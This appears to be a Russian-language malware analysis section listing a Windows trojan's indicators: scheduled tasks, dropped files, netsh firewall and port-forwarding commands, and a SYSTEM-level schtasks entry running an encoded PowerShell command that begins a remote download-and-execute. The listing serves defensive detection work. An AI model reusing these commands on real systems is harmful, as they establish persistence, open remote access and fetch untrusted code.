Техническая информация
- <SYSTEM32>\tasks\microsoft\windows\bluetool
- <SYSTEM32>\tasks\zwwnzyvr
- <SYSTEM32>\tasks\qsztsraw
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 65533 DNSd
- %WINDIR%\temp\svchost.exe
- %WINDIR%\temp\ipc.txt
- %WINDIR%\zwwnzyvr.exe
- '<SYSTEM32>\cmd.exe' /c echo JLAYtoQ >> %WINDIR%\temp\svchost.exe&echo "*" >%WINDIR%\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c echo JLAYtoQ >> %WINDIR%\temp\svchost.exe&echo "*" >%WINDIR%\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1...
- '<SYSTEM32>\netsh.exe' interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACk...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn ZWwnZYvr /tr "%WINDIR%\ZWwnZYvr.exe" /F
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\qszTSraW" /tr "%WINDIR%\sLGFt.exe" /F